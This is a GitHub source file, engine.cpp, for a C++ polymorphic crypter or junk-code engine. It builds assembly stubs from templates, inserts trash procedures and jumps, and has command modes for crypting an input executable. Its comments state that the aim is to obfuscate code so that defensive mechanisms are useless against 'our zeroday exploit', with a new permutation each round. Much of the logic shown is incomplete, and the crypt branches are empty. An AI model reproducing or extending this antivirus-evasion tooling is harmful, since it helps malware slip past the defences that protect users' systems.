-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathengine.cpp
274 lines (220 loc) · 7.87 KB
/
engine.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
#include "resource.h"
// basic overview : Generate blocks of data for each stage of the
// overall algorithm toward the output program
// different stages of entire program, for each stage create block
// then continue creating blocks till all stages are complete, and
// program is complete
// For instance:
// -- small delay execution maybe applicable?
// -- -------------------
// -- | Extract data |
// -- | decrypt data |-------
// -- ------------------- | eg swap blocks in series if applicable
// -- | Extract path | |
// -- | decrypt path |<------
// -- -------------------
// --
// point, can series of instructions / individual instructions be swapped
// and program retain ability to execute correctly of course - much testing
// will need to occur
// All in all, completely obfuscating the source hence rendering
// defensive mechanism useless for our zeroday exploit which can
// continuosly be generated through simple permutation assembler
// TODO - AI, generate logs of what occurred last in order to
// maintain completely different permutations for each round
AVALIABLEREG m_stAvaliableReg;
EIGHT_BITREG m_stEightBitReg;
SIXTEEN_BITREG m_stSixteenBitReg;
THIRTYTWO_BITREG m_stThirtytwoBitReg;
std::list<TRASHOBJ> g_lsGlobalTrashProcedure;
std::list<TRASHOBJ>::iterator g_lsGlobalTrashProcedureIterator;
std::list<TRASHOBJ> g_lsGlobalTrashJMP;
std::list<TRASHOBJ>::iterator g_lsGlobalTrashJMPIterator;
std::list<TRASHOBJ> g_lsGlobalTrashDirectInsert;
std::list<TRASHOBJ>::iterator g_lsGlobalTrashDirectInsertIterator;
std::list<VARIABLE> g_lsGlobalVariable;
std::list<VARIABLE>::iterator g_lsGlobalVariableIterator;
std::vector <string> g_vszGlobalTrashJMPLabels;
unsigned int g_uiTotalTrashProcObjs = 0;
unsigned int g_uiTotalTrashDirectInsertObjs = 0;
unsigned int g_uiTotalTrashJMPObjs = 0;
unsigned int g_uiTotalTrashObjs = 0;
unsigned int g_uiGeneratedOpcodeIndex[2];
static const char g_chAlpha[] = // for our Random Character generator
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
//sections
BLOCKOBJ m_sectionArray[5] = {(g_szTemplatePath + "Header.txt"), (g_szTemplatePath + "Include.txt"),
(g_szTemplatePath + "Data.txt"),(g_szTemplatePath + "Text.txt"),
(g_szTemplatePath + "Import.txt")
};
// opcodes
BLOCKOBJ m_opcodeArray[8] = {(g_szOpcodePath + "Arithmetic-1.txt"), // 0
(g_szOpcodePath + "Arithmetic-2.txt"), // 1
(g_szOpcodePath + "Logic-1.txt"), // 2
(g_szOpcodePath + "Misc.txt"), // 3
(g_szOpcodePath + "Transfer-0.txt"), // 4
(g_szOpcodePath + "Transfer-1.txt"), // 5
(g_szOpcodePath + "Transfer-2.txt"), // 6
(g_szOpcodePath + "ConditionalJumps.txt") // 7
};
/*(g_szOpcodePath + "Multiplying.txt"), // 8
(g_szOpcodePath + "Rotate.txt"), // 9
(g_szOpcodePath + "Subtracting.txt"), // 10
(g_szOpcodePath + "Transfer.txt") // 11
*/
// http://www.jegerlehner.ch/intel/IntelCodeTable.pdf
// http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/index.htm?tx=4
// m_szRegister
int main(int argc, char *argv[])
{
if (*argv[0] == '1')
{ // Then we are just generating a brand new stub
}
else if (*argv[1] == '2')
{ // Then we will be expecting input executable
}
else if (*argv[1] == '3')
{ // Then we just crypt using stub that has already been created, expecting input
}
g_uiDwordsTillStackCorrupts = 28;
//DereferenceOperand("EBX");
AllocateVectorList(); // on startup
g_lsGlobalVariableIterator = g_lsGlobalVariable.begin();
InitiateVariableList(); // on startup
g_lsGlobalTrashJMPIterator = g_lsGlobalTrashJMP.begin();
g_lsGlobalTrashProcedureIterator = g_lsGlobalTrashProcedure.begin();
g_lsGlobalTrashDirectInsertIterator = g_lsGlobalTrashDirectInsert.begin();
ProcessTrash();
g_lsGlobalTrashJMPIterator = g_lsGlobalTrashJMP.begin();
g_lsGlobalTrashProcedureIterator = g_lsGlobalTrashProcedure.begin();
g_lsGlobalTrashDirectInsertIterator = g_lsGlobalTrashDirectInsert.begin();
g_lsGlobalVariableIterator = g_lsGlobalVariable.begin();
for (unsigned int i = 0; i < g_lsGlobalVariable.size(); i++)
{
m_sectionArray[2].m_vszBuffer.push_back(g_lsGlobalVariableIterator->m_szVariableDeclaration);
g_lsGlobalVariableIterator++;
}
for (unsigned int i = 0; i < g_uiTotalTrashDirectInsertObjs; i++)
{
for (unsigned int z = 0; z < g_lsGlobalTrashDirectInsertIterator->m_vszBuffer.size(); z++)
{
m_sectionArray[3].m_vszBuffer.push_back(g_lsGlobalTrashDirectInsertIterator->m_vszBuffer[z]);
}
g_lsGlobalTrashDirectInsertIterator++;
} // THIS ONE HERE IS CORRECT, COPY AND USE THIS ONE!
// exit process lol
m_sectionArray[3].m_vszBuffer.push_back("push 0\nCall [ExitProcess]");
for (unsigned int i = 0; i <g_uiTotalTrashJMPObjs; i++)
{
for (unsigned int z = 0; z < g_lsGlobalTrashJMPIterator->m_vszBuffer.size(); z++)
{
m_sectionArray[3].m_vszBuffer.push_back(g_lsGlobalTrashJMPIterator->m_vszBuffer[z]);
}
g_lsGlobalTrashJMPIterator++;
}
for (unsigned int i = 0; i < g_uiTotalTrashProcObjs; i++)
{
for (unsigned int z = 0; z < g_lsGlobalTrashProcedureIterator->m_vszBuffer.size(); z++)
{
m_sectionArray[3].m_vszBuffer.push_back(g_lsGlobalTrashProcedureIterator->m_vszBuffer[z]);
}
g_lsGlobalTrashProcedureIterator++;
}
WriteFile();
// assign the iterators
// now generate the program..
// after generating the program, update text sec, import sec
// order: 1 - main code flow buffer. 2 - jmp buffer. 3 - proc buffer
// find random label
// Finished!
return 0;
}
// All blocks derived from BaseBlock
// -- Constructors
BLOCKOBJ::BLOCKOBJ(string m_szFileName)
{
// read files in
ifstream m_iFile;
m_iFile.open(m_szFileName);
if (m_iFile)
{
string m_szTemp;
while (getline(m_iFile,m_szTemp))
{
m_vszBuffer.push_back(m_szTemp);
//m_vszBuffer.push_back("\n");
}
m_iFile.close();
}
else
{
cout << "Error file not found - " << m_szFileName << endl;
}
}
// these three structs are used as loops
THIRTYTWO_BITREG::THIRTYTWO_BITREG()
{
m_szRegArray[0] = "EAX";
m_szRegArray[1] = "EBX";
m_szRegArray[2] = "ECX";
m_szRegArray[3] = "EDX";
m_szRegArray[4] = "EDI";
m_szRegArray[5] = "ESI";
}
SIXTEEN_BITREG::SIXTEEN_BITREG()
{
m_szRegArray[0] = "AX";
m_szRegArray[1] = "BX";
m_szRegArray[2] = "CX";
m_szRegArray[3] = "DX";
m_szRegArray[4] = "DI";
m_szRegArray[5] = "SI";
}
EIGHT_BITREG::EIGHT_BITREG()
{
m_szRegArray[0] = "AH";
m_szRegArray[1] = "AL";
m_szRegArray[2] = "BH";
m_szRegArray[3] = "BL";
m_szRegArray[4] = "CH";
m_szRegArray[5] = "CL";
m_szRegArray[6] = "DH";
m_szRegArray[7] = "DL";
}
AVALIABLEREG::AVALIABLEREG()
{
// at the beginning of the program should all be true
EAX = 2;// 0 = in use by program, do not use
EBX = 2;// 1 = in use by junk program, still can use lower 8 bits
ECX = 2;// 2 = avaliable to use
EDX = 2;
EDI = 1; // NOTE : ESI/EDI do not have lower 8 bits
ESI = 1; // ie TRUE TRUE
AX = 2;
BX = 2;
CX = 2;
DX = 2;
DI = 2;
SI = 2;
AH = TRUE;
AL = TRUE;
BH = TRUE;
BL = TRUE;
CH = TRUE;
CL = TRUE;
DH = TRUE;
DL = TRUE;
}
/*
GLOBALVARIABLESUSED::GLOBALVARIABLESUSED(unsigned int m_uiCount)
{
m_uiGlobalVariablesCount = m_uiCount;
for (unsigned int i = 0; i < m_uiCount; i++)
{
// generate random string
// push the string back
// set vector boolean value to false
}
//g_chAlpha
}
*/